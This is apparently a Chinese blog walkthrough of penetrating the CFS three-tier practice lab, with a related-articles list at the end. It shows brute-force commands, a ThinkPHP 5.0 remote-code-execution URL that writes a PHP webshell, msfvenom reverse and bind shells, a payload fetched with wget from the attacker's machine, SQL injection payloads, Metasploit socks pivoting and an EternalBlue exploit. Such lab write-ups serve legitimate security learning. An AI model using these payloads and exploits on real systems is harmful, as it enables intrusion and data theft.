前言

作者简介:不知名白帽,网络安全学习者。

博客主页:https://blog.csdn.net/m0_63127854?type=blog

内网渗透专栏:https://blog.csdn.net/m0_63127854/category_11885934.html

网络安全交流社区:https://bbs.csdn.net/forums/angluoanquan

CFS三层靶场搭建:

内网渗透之CFS三层靶机搭建_不知名白帽的博客-CSDN博客

目录

Socks代理实战-MSF

01渗透场景(网络拓扑)

02测试Target1

02.1信息收集

02.2分析利用(21/22/3306/8888)

02.3分析利用(80)

02.4主机信息收集

02.5建立Socks代理

03测试Target2

03.1开启代理

03.2信息收集

03.3分析利用

03.4主机信息收集

03.5建立隧道

04测试Target3

04.1信息收集

04.2分析利用


借鉴文章链接:

CFS三层靶机搭建及其内网渗透_ZredamanJ的博客-CSDN博客_cfs三层

代理技术应用之三层内网漫游 - FreeBuf网络安全行业门户

CFS三层靶机搭建及其内网渗透附靶场环境 - 安全客,安全资讯平台

Socks代理实战-MSF

01渗透场景(网络拓扑)

02测试Target1

02.1信息收集

nmap -sS -v -A 192.168.1.128

nmap -A -v -T4 192.168.1.128

02.2分析利用(21/22/3306/8888)

21/22端口:弱口令爆破

hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.1.128 ftphydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.1.128 ssh

3306端口:不允许远程IP链接

8888端口:宝塔登录页面

02.3分析利用(80)

80端口:Thinkphp v5.0

存在远程命令执行漏洞,通过命令执行写入一句话,可GetShell

/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST['cmd'])?>

蚁剑连接

发现两个flag

02.4主机信息收集

ifconfig

发现192.168.22.0/24内网网段

发现192.168.22.129存活主机

02.5建立Socks代理

msfvenom生成payload

查找可用的payload

msfvenom -l payload | grep "linux/x64" | awk "{print $l}"

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.130 LPORT=6666 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf >6666.elfmsfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.130 LPORT=6666 -f elf >6666.elfmsfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.130 lport=6666 -f elf >6666.php

上传到target1的tmp目录下

或者开启http服务用wgett来下载

python -m http.server(默认端口为8000)

wget http://192.168.1.130(kali的ip):8000/6666.elf

kali中配置运行监听模块

use exploit/multi/handlerset payload linux/x64/meterpreter/reverse_tcpset lhost 192.168.1.130set lport 6666exploit

chmod 777 6666.elf./6666.elf

反弹shell

获得target1的meterpreter shell后,添加到192.168.22网段的路由

run autoroute -s 192.168.22.0/24 run autoroute -p

使用msf的socks5模块建立socks服务,并配置prochains代理

search socks

use auxiliary/server/socks_proxyset SRVHOST 0.0.0.0set SRVPORT 1080exploit

vim /etc/proxychains4.conf

socks5 192.168.1.130 1080

需要加上刚刚配置好的代理文件才能进行扫描

proxychains4 nmap -Pn -sT 192.168.22.128

03测试Target2

03.1开启代理

火狐浏览器插件foxyproxy

配置代理

访问192.168.22.128

03.2信息收集

proxychains4 nmap -Pn -sT 192.168.22.128

03.3分析利用

翻看一下robots.txt

找到后台登录地址,有验证码先不尝试爆破

查看源代码找到提示,存在sql注入

proxychains4 sqlmap -u “http://192.168.22.128/index.php?r=vul&keyword=1” --dbsproxychains4 sqlmap -u “http://192.168.22.128/index.php?r=vul&keyword=1” -p keyword -D bagecms –tablesproxychains4 sqlmap -u “http://192.168.22.128/index.php?r=vul&keyword=1” -p keyword -D bagecms -T bage_admin –columnsproxychains4 sqlmap -u “http://192.168.22.128/index.php?r=vul&keyword=1” -p keyword -D bagecms -T bage_admin -C username,password –dump注意:socks5不稳定,以用sqlmap跑就会断开

手注一下

http://192.168.22.128/index.php?r=vul&keyword=1' union select group_concat(username),group_concat(password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 from bage_admin-- -

登录后台(admin/123qwe)

发现模板中存在index.php文件,可以写入一句话木马

来到标签页,可以看到一句话生效了,接下里在SocksCap64中打开蚁剑,利用蚁剑连接,注意SocksCap设置好代理

03.4主机信息收集

03.5建立隧道

生成正向后门

msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=7777 -f elf > 7777.elf

msf正向连接

use exploit/multi/handlerset payload linux/x64/meterpreter/bind_tcpset rhost 192.168.22.128set LPORT 7777exploit

开启http服务,下载7777.elf文件

提权并运行7777.elf

chomd 777 7777.elf./7777.elf

反弹shell

添加路由

run autoroute -s 192.168.33.0/24run autoroute -p

04测试Target3

04.1信息收集

proxychains4 nmap -Pn -sT 192.168.33.33

04.2分析利用

开启445、3389端口,我们可以用永恒之蓝进行攻击

use exploit/windows/smb/ms17_010_psexecset payload windows/meterpreter/bind_tcpset RHOST 192.168.33.33exploit

shellnet user

cd /dir /S /B *flag*type C:\Windows\System32\config\flag.txt# /B 显示文件夹或文件的名字# /S 显示指定目录和所有子目录中的文件

linux无法识别window汉字会乱码,修改一下代码页(65001代表的是UTF-8)

chcp 65001

找到flag了

内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)相关推荐

  1. 内网渗透之CFS三层靶场渗透

    环境搭建 网卡设置 kali为攻击机:192.168.3.57(桥接模式) Target1:192.168.3.120(桥接模式),192.168.22.128(仅主机模式Vmnet2) Target ...

  2. 内网linux服务器通过CCproxy代理上网

    内网linux服务器通过CCproxy代理上网 安装CCproxy软件 配置网络代理端口 设置 账号 服务器端 本教程记录了通过局域网内能访问外网的Windows平台,使用CCproxy代理使内网节点 ...

  3. 内网Linux服务器如何通过代理方式访问外网

    在目前5G网络和互联网高速发展的时代,还有云计算的普及,但是考虑到很多安全的因素考虑,在现实工作中,很多时候需要脱离外网进入linux,这样导致工作的效率大幅度减低,下面介绍几种通过代理的方式访问内网 ...

  4. 红蓝对抗之隧道技术第一篇(内网穿透、端口映射端口转发、Netsh端口转发、CS正反向连接多层内网、Burp设置上游代理访问内网、MSF protfwd端口转发/重定向)

    文章目录 隧道应用 端口映射&端口转发 Netsh端口转发 Netsh端口转发meterpreter CS正向连接多层内网 CS反向连接多层内网 Burp设置上游代理访问内网 MSF prot ...

  5. 让AWS虚机访问公司内网资源(SSH反向代理)

    背景说明 今天我要将AWS虚机升级到beta版本并进行一些测试. 由于beta版本只在公司内网提供,因此我需要将升级用的文件手动拷贝到AWS虚机中.原始的方法,很容易理解: 用AWS上能找到的最新版本 ...

  6. python内网穿透 开源_反向代理和内网穿透

    概念 反向代理看上去看深奥,其实不然,只是因为汉语言文化的差异导致它看上去深奥.一般反派感觉都比较厉害和神秘. 要理解反向代理,我们就不得不说一下正向代理. 正向代理 (Forward Proxy) ...

  7. centos搭建内网DNS配合nginx反向代理

    需求:在内网已部署一个苹果CMS,但每次访问都要通过IP很不方便,需要转变为用域名访问 方法一: 给每个需要访问该网站的人添加一条hosts记录:如果只是几个人这方法的确很快,但是如果上百人甚至上千人 ...

  8. win10环境socks代理实战

    0x00 起因 由于更新了开发环境,我需要使用ssh登录多个主机,有一个虚拟化环境,上面存在一些虚拟化产品,需要登录管理界面. 0x01 调研 首先想到的是vpn技术,这里可以选择的比较多,我们可以使 ...

  9. 京东内网遭开源的“顶级”SpringCloud实战手册,GitHub列为首推

    相信大家都对springcloud不会陌生,但是我还是给大家介绍一下: Spring Cloud是一系列框架的有序集合.它利用Spring Boot的开发便利性巧妙地简化了分布式系统基础设施的开发,如 ...

最新文章

  1. 微软亚洲研究院副院长刘铁岩:AI如何助力节能减排?
  2. bash命令行常用快捷键
  3. js 设计模式—工厂模式
  4. od 追踪_裁判员行为规范【基本功】——追踪裁判违例宣判练习 /五秒违例
  5. leetcode- 两数之和
  6. js oop写法小例子
  7. ARC077E - guruguru(差分)
  8. 懒加载方式下的单例模式
  9. linux下安装minio
  10. 用layui实现下拉框select多选,取值
  11. 如何在Mac中使用预览应用合并PDF文件,Mac预览应用合并PDF文件?
  12. struts2之数据处理的三种方式
  13. WindowsXP相关设置对应的注册表位置
  14. mac maven安装与配置镜像
  15. 架构师应该具备什么技能
  16. Three Bags CodeForces - 1467C (贪心)
  17. iptables SNAT 和DNAT的转化配置实验
  18. 一文搞清楚码元速率(波特率)和比特速率(比特率)的区别
  19. python374安装教程_Centos7.6安装工具(5)--编译安装python374
  20. CCF201403-5 任务调度

热门文章

  1. 渡课学习日记 20158/02/8/28java 第七课
  2. SpringCloud 之 聚合项目 IDEA 创建(准备篇)
  3. Freesurfer安装
  4. Excel文件复制追加到另一个Excel文件
  5. 简单python代码——猜数字
  6. Android 7.0修改ro属性
  7. 室内定位导航技术,电厂人员安全管理
  8. 人性的弱点全集的评论
  9. vscode 主题的颜色定制
  10. matlab ddesd,具有状态相关时滞的 DDE